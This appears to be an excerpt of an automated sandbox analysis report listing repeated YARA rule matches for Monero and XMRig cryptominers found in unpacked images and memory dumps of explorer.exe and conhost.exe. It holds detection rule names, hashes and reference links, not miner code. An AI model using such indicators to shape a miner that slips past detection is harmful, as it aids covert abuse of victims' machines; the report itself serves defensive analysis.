Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
